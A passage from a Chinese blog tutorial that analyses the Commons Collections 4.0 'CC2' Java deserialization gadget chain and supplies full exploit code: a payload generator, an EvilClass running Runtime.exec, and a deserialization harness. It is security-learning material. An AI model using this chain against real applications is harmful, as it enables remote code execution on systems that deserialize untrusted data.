<p><code>TransformingComparator</code> 是 CC2 新引入的核心类，以前的链里没用过。它实现了 <code>Comparator</code> 接口，内部持有一个 <code>Transformer</code>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405181929431.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405181748671.png"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TransformingComparator</span>&lt;I, O&gt; <span class="keyword">implements</span> <span class="title class_">Comparator</span>&lt;I&gt;, Serializable &#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">final</span> Comparator&lt;O&gt; decorated;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">final</span> Transformer&lt;? <span class="built_in">super</span> I, ? <span class="keyword">extends</span> <span class="title class_">O</span>&gt; transformer;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="type">int</span> <span class="title function_">compare</span><span class="params">(<span class="keyword">final</span> I obj1, <span class="keyword">final</span> I obj2)</span> &#123;</span><br><span class="line">        <span class="keyword">final</span> <span class="type">O</span> <span class="variable">value1</span> <span class="operator">=</span> <span class="built_in">this</span>.transformer.transform(obj1);</span><br><span class="line">        <span class="keyword">final</span> <span class="type">O</span> <span class="variable">value2</span> <span class="operator">=</span> <span class="built_in">this</span>.transformer.transform(obj2);</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">this</span>.decorated.compare(value1, value2);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>只需要让 <code>transformer</code> 是 <code>InvokerTransformer</code>，就能触发 <code>InvokerTransformer.transform()</code>，再把 <code>obj</code> 换成 <code>TemplatesImpl</code> 实例，链就通了。</p>
<p><code>TransformingComparator</code> 第一个构造方法只需要传入一个参数：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405191628134.png"></p>
<p>（<code>this(...)</code> 是在构造方法里调用同类的另一个构造方法）</p>
<p>直接 new 一个对象：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">TransformingComparator</span> <span class="variable">comparator</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TransformingComparator</span>(invokerTransformer);</span><br></pre></td></tr></table></figure>

<p>这样 <code>transformer</code> 就是 <code>invokerTransformer</code> 了。</p>
<p>下面解决 <code>compare</code> 的两个参数 <code>(final I obj1, final I obj2)</code> 从哪里来的问题。</p>
<p><code>TransformingComparator</code> 实现了 <code>Comparator</code> 接口，<code>compare</code> 方法就是在这个接口里定义的：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405193634774.png"></p>
<p>查找用法，有很多函数都调用了 <code>compare</code>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405193956559.png"></p>
<p>最终找到的是 <code>PriorityQueue</code> 里的 <code>siftDownUsingComparator</code> 方法：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405200256058.png"></p>
<p>这里面调用了两次 <code>comparator.compare</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">comparator.compare((E) c, (E) queue[right])  // 比较左右子节点</span><br><span class="line">comparator.compare(x, (E) c)                 // 比较父节点和子节点</span><br></pre></td></tr></table></figure>

<p>只需要保证至少能调用一次就行。</p>
<hr>
<h3 id="PriorityQueue：入口点"><a href="#PriorityQueue：入口点" class="headerlink" title="PriorityQueue：入口点"></a>PriorityQueue：入口点</h3><p><code>c</code> 和 <code>queue[right]</code> 的来源：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Object</span> <span class="variable">c</span> <span class="operator">=</span> queue[child];</span><br><span class="line"><span class="type">int</span> <span class="variable">right</span> <span class="operator">=</span> child + <span class="number">1</span>;</span><br></pre></td></tr></table></figure>

<p><code>queue[]</code> 就是 <code>PriorityQueue</code> 内部存元素的数组。所以只需要往这里面添加 <code>TemplatesImpl</code> 实例，<code>c</code> 和 <code>queue[right]</code> 就都是 <code>TemplatesImpl</code>，自然作为 <code>obj1</code> 和 <code>obj2</code> 传进 <code>compare()</code>。</p>
<p>上面有 <code>add</code> 函数：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405221441003.png"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">return</span> offer(e);</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405221521254.png"></p>
<p>这正是添加数据的函数，直接用：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">queue.add(templates);</span><br></pre></td></tr></table></figure>

<p>不过 <code>compare</code> 是在 <code>siftDownUsingComparator</code> 里调用的，而且这是个私有方法：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405222101566.png"></p>
<p>思路就是往上找能调用到这个私有方法的公有方法。链条是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">readObject() → heapify() → siftDown() → siftDownUsingComparator() → compare()</span><br></pre></td></tr></table></figure>

<p><code>siftDownUsingComparator</code> 往上是 <code>siftDown</code>，私有方法：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405223057425.png"></p>
<p>再往上是 <code>heapify</code>，也是私有：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405223157201.png"></p>
<p>终点就是 <code>readObject</code> 方法，同样是私有的，但没关系——反序列化该执行还是执行：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405223314861.png"></p>
<p>现在完整的链已经找到了，只需要传入正确的参数就能自动触发。</p>
<hr>
<p><strong>构造 PriorityQueue</strong></p>
<p><code>PriorityQueue</code> 的构造方法有点多，都是对 <code>initialCapacity</code> 和 <code>comparator</code> 参数的控制。选一个参数少、又能传入我们需要的参数的方法：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DEFAULT_INITIAL_CAPACITY 默认是 11</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405224913614.png"></p>
<p>这两个构造方法都能传入 <code>TransformingComparator</code> 对象（里面有 <code>compare</code> 方法触发 <code>transform</code>），不过一个默认容量是 11，我们只需要传入 2 个元素，选第二个：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405225001014.png"></p>
<p>现在的构造顺序：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;newTransformer&quot;</span>, <span class="literal">null</span>, <span class="literal">null</span>);</span><br><span class="line"></span><br><span class="line"><span class="type">TransformingComparator</span> <span class="variable">comparator</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TransformingComparator</span>(invokerTransformer);</span><br><span class="line"></span><br><span class="line"><span class="type">PriorityQueue</span> <span class="variable">queue</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">PriorityQueue</span>(<span class="number">2</span>, comparator);</span><br><span class="line"></span><br><span class="line">queue.add(templates);</span><br><span class="line">queue.add(templates);</span><br></pre></td></tr></table></figure>

<p>不过直接这样写是不行的——序列化的时候会弹出一次计算器：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405230431807.png"></p>
<p>反序列化的时候反而没有效果了。</p>
<p>原因是：往 <code>PriorityQueue</code> 里 <code>add()</code> 元素的时候，也会触发堆排序，也就是说也会调用 <code>comparator.compare()</code>。如果这时候 transformer 已经是 <code>InvokerTransformer</code>，add 阶段就提前触发了一次 RCE，而且这时候第二个元素还没 add 进去，排序逻辑出问题，导致后面反序列化时链跑不起来了。</p>
<p>解决方法是<strong>构造时先用无害的 Transformer 占位，add 完元素再通过反射替换成 InvokerTransformer</strong>：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">TransformingComparator</span> <span class="variable">comparator</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TransformingComparator</span>(<span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(<span class="number">1</span>));</span><br><span class="line"><span class="type">PriorityQueue</span> <span class="variable">queue</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">PriorityQueue</span>(<span class="number">2</span>, comparator);</span><br><span class="line">queue.add(templates);</span><br><span class="line">queue.add(templates);</span><br><span class="line"><span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;newTransformer&quot;</span>, <span class="literal">null</span>, <span class="literal">null</span>);</span><br><span class="line">setFieldValue(comparator, <span class="string">&quot;transformer&quot;</span>, invokerTransformer);</span><br></pre></td></tr></table></figure>

<p>无害占位用的是 <code>ConstantTransformer</code>——不管传入什么都返回里面固定的值，比 <code>InvokerTransformer(&quot;toString&quot;, null, null)</code> 这种写法更安全简单。</p>
<p>结果正常：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405232257989.png"></p>
<hr>
<h2 id="完整调用链追踪"><a href="#完整调用链追踪" class="headerlink" title="完整调用链追踪"></a>完整调用链追踪</h2><p>现在顺着跟一遍完整的调用流程：</p>
<p>入口的 <code>readObject</code> 读取文件：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406124332093.png"></p>
<p>自动触发我们对象（<code>PriorityQueue</code>）的 <code>readObject</code> 方法：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406124424017.png"></p>
<p><code>readObject</code> 里调用 <code>heapify</code>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406124509322.png"></p>
<p><code>heapify</code> 触发 <code>siftDown</code>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406124540675.png"></p>
<p><code>siftDown</code> 触发 <code>siftDownUsingComparator</code>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406124618325.png"></p>
<p><code>siftDownUsingComparator</code> 里调用 <code>compare</code>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406124642150.png"></p>
<p><code>compare</code> 里传入两个 <code>TemplatesImpl</code> 对象触发，此时 <code>transformer</code> 已经是被反射替换过的 <code>InvokerTransformer</code>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406124718839.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406124819725.png"></p>
<p><code>transform</code> 触发反射调用 <code>TemplatesImpl.newTransformer</code>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406124942339.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406125101148.png"></p>
<p><code>newTransformer</code> 触发 <code>getTransletInstance</code>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406125601692.png"></p>
<p>中间经过 <code>defineTransletClasses</code> 对 <code>_tfactory</code> 的处理（前面讲过，反序列化时自动赋值）：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406125738394.png"></p>
<p>最终到 <code>getTransletInstance</code> 里的 <code>newInstance</code> 实例化对象，触发构造方法执行 RCE：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406125920497.png"></p>
<hr>
<h2 id="为什么必须用-CC-4-0"><a href="#为什么必须用-CC-4-0" class="headerlink" title="为什么必须用 CC 4.0"></a>为什么必须用 CC 4.0</h2><p>在 CC 3.2.1 里，<code>TransformingComparator</code> 没有实现 <code>Serializable</code>：</p>
<p>CC 3.2.1：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406130704876.png"></p>
<p>CC 4.0：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260406130211928.png"></p>
<p><strong>任何类都可以被实例化（<code>new</code>），但只有实现了 <code>Serializable</code> 接口的类才能被序列化成字节流。</strong> 3.2.1 的 <code>TransformingComparator</code> 没有这个接口，序列化时直接抛异常：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 没有 Serializable，序列化时报错</span></span><br><span class="line"><span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(...);</span><br><span class="line">oos.writeObject(comparator);  <span class="comment">// 抛 NotSerializableException</span></span><br></pre></td></tr></table></figure>

<p>4.0 里加上了这个接口，才能被正常序列化。这是 CC2 只能用 CC 4.0 的根本原因。</p>
<hr>
<p><strong>完整链路：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">PriorityQueue.readObject()</span><br><span class="line">  → heapify()</span><br><span class="line">    → siftDown()</span><br><span class="line">      → siftDownUsingComparator()</span><br><span class="line">        → TransformingComparator.compare(obj1, obj2)</span><br><span class="line">          → InvokerTransformer.transform(obj1)   // obj1 是 TemplatesImpl</span><br><span class="line">            → TemplatesImpl.newTransformer()</span><br><span class="line">              → defineTransletClasses() → 加载字节码 → RCE</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="EXP-编写"><a href="#EXP-编写" class="headerlink" title="EXP 编写"></a>EXP 编写</h2><p>有一个构造上的小坑需要注意：往 <code>PriorityQueue</code> 里 <code>add()</code> 元素时，也会触发堆排序，也就是说也会调用 <code>comparator.compare()</code>。如果这时候 transformer 已经是 <code>InvokerTransformer</code>，add 阶段就会触发一次 RCE，而且这时候 TemplatesImpl 可能还没准备好，直接报错。</p>
<p>解决方法是<strong>构造时先用无害的 Transformer，add 完元素再通过反射替换成 InvokerTransformer</strong>。</p>
<p>完整 EXP：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections4.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections4.comparators.TransformingComparator;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections4.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections4.functors.InvokerTransformer;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.nio.file.Files;</span><br><span class="line"><span class="keyword">import</span> java.nio.file.Paths;</span><br><span class="line"><span class="keyword">import</span> java.util.PriorityQueue;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CC2</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">setFieldValue</span><span class="params">(Object obj, String fieldName, Object value)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Field</span> <span class="variable">f</span> <span class="operator">=</span> obj.getClass().getDeclaredField(fieldName);</span><br><span class="line">        f.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        f.set(obj, value);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">byte</span>[] bytes = Files.readAllBytes(Paths.get(<span class="string">&quot;target\\classes\\org\\example\\EvilClass.class&quot;</span>));</span><br><span class="line"></span><br><span class="line">        <span class="type">TemplatesImpl</span> <span class="variable">templates</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_bytecodes&quot;</span>, <span class="keyword">new</span> <span class="title class_">byte</span>[][]&#123;bytes&#125;);</span><br><span class="line">        setFieldValue(templates, <span class="string">&quot;_name&quot;</span>, <span class="string">&quot;pwn&quot;</span>);</span><br><span class="line"><span class="comment">//        setFieldValue(templates, &quot;_tfactory&quot;, new TransformerFactoryImpl());</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="type">TransformingComparator</span> <span class="variable">comparator</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TransformingComparator</span>(<span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(<span class="number">1</span>));</span><br><span class="line">        <span class="type">PriorityQueue</span> <span class="variable">queue</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">PriorityQueue</span>(<span class="number">2</span>, comparator);</span><br><span class="line">        queue.add(templates);</span><br><span class="line">        queue.add(templates);</span><br><span class="line">        <span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;newTransformer&quot;</span>, <span class="literal">null</span>, <span class="literal">null</span>);</span><br><span class="line">        setFieldValue(comparator, <span class="string">&quot;transformer&quot;</span>, invokerTransformer);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="comment">// 5. 序列化到文件</span></span><br><span class="line">        <span class="keyword">try</span> (<span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;payload.ser&quot;</span>))) &#123;</span><br><span class="line">            oos.writeObject(queue);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>恶意类 <code>EvilClass.java</code>：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.DOM;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.TransletException;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xml.internal.serializer.SerializationHandler;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">EvilClass</span> <span class="keyword">extends</span> <span class="title class_">AbstractTranslet</span> &#123;</span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            Runtime.getRuntime().exec(<span class="string">&quot;calc&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">transform</span><span class="params">(DOM document, SerializationHandler[] handlers)</span> <span class="keyword">throws</span> TransletException &#123;&#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">transform</span><span class="params">(DOM document, DTMAxisIterator iterator, SerializationHandler handler)</span> <span class="keyword">throws</span> TransletException &#123;&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>反序列化模拟：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.FileInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CC2Deserialize</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="keyword">try</span> (<span class="type">ObjectInputStream</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="string">&quot;payload.ser&quot;</span>))) &#123;</span><br><span class="line">            ois.readObject();</span><br><span class="line">        &#125;</span><br><span class="line">        System.out.println(<span class="string">&quot;Deserialization completed, check if calc popped.&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>CC2 的整体思路比前几条链更简洁，不需要 LazyMap 那种代理触发机制，链路一目了然：</p>
<ul>
<li><strong>入口</strong>：<code>PriorityQueue.readObject()</code> 反序列化时重建堆，必然触发比较操作</li>
<li><strong>中转</strong>：<code>TransformingComparator.compare()</code> 把比较操作转换成 transform 调用</li>
<li><strong>执行</strong>：<code>InvokerTransformer</code> 反射调用 <code>TemplatesImpl.newTransformer()</code> 加载字节码</li>
</ul>
<p>有几个值得记住的细节：</p>
<ol>
<li>必须用 CC 4.0，3.x 里 <code>TransformingComparator</code> 不可序列化</li>
<li>构造时先用 <code>ConstantTransformer</code> 占位，add 完再反射替换，避免提前触发</li>
<li>队列至少要有 2 个元素，<code>siftDownUsingComparator</code> 才会被调用（size&#x3D;1 时 <code>half=0</code>，while 循环直接不进）</li>
<li><code>_tfactory</code> 不需要手动反射设置——反序列化时 <code>TemplatesImpl.readObject()</code> 会自动初始化；<code>transient</code> 修饰导致手动赋值在序列化时也会丢失</li>
</ol>
</article>
<div class="article-footer">
    <section id="license">
      <div class="header"><span>许可协议</span></div>
      <div class="body"><p>本文采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议，转载请注明出处。</p>
</div>
    </section>
    

</div>






<footer class="page-footer footnote"><hr><div class="welcome-text" style="text-align: center; padding: 10px 0; font-size: 14px; color: #fff;">欢迎入侵本站</div><div class="text"></div></footer>
<div class="main-mask" onclick="sidebar.dismiss()"></div></div><aside class="l_right">
<div class="widgets">

<widget class="widget-wrapper toc" id="data-toc" collapse="false"><div class="widget-header dis-select"><span class="name">本文目录</span><a class="cap-action" onclick="sidebar.toggleTOC()" ><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg></a></div><div class="widget-body"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-CC2-%E9%93%BE-%E2%80%94%E2%80%94-tfactory-%E8%B5%8B%E5%80%BC%E9%97%AE%E9%A2%98-PriorityQueue-%E6%96%B0%E5%85%A5%E5%8F%A3"><span class="toc-text">代码审计 | CC2 链 —— _tfactory 赋值问题 PriorityQueue 新入口</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95"><span class="toc-text">目录</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83"><span class="toc-text">环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%93%BE%E8%B7%AF%E5%88%86%E6%9E%90"><span class="toc-text">链路分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Sink%EF%BC%9ATemplatesImpl-%E4%B8%8E-tfactory-%E8%B5%8B%E5%80%BC%E9%97%AE%E9%A2%98"><span class="toc-text">Sink：TemplatesImpl 与 _tfactory 赋值问题</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#InvokerTransformer"><span class="toc-text">InvokerTransformer</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#TransformingComparator%EF%BC%88%E5%85%B3%E9%94%AE%E8%8A%82%E7%82%B9%EF%BC%89"><span class="toc-text">TransformingComparator（关键节点）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#PriorityQueue%EF%BC%9A%E5%85%A5%E5%8F%A3%E7%82%B9"><span class="toc-text">PriorityQueue：入口点</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4%E8%B0%83%E7%94%A8%E9%93%BE%E8%BF%BD%E8%B8%AA"><span class="toc-text">完整调用链追踪</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E5%BF%85%E9%A1%BB%E7%94%A8-CC-4-0"><span class="toc-text">为什么必须用 CC 4.0</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EXP-%E7%BC%96%E5%86%99"><span class="toc-text">EXP 编写</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%8F%E7%BB%93"><span class="toc-text">小结</span></a></li></ol></li></ol></div><div class="widget-footer"><a class="top" onclick="util.scrollTop()"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><!-- Icon from Solar by 480 Design - https://creativecommons.org/licenses/by/4.0/ --><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="1.5"><path stroke-linejoin="round" d="m9 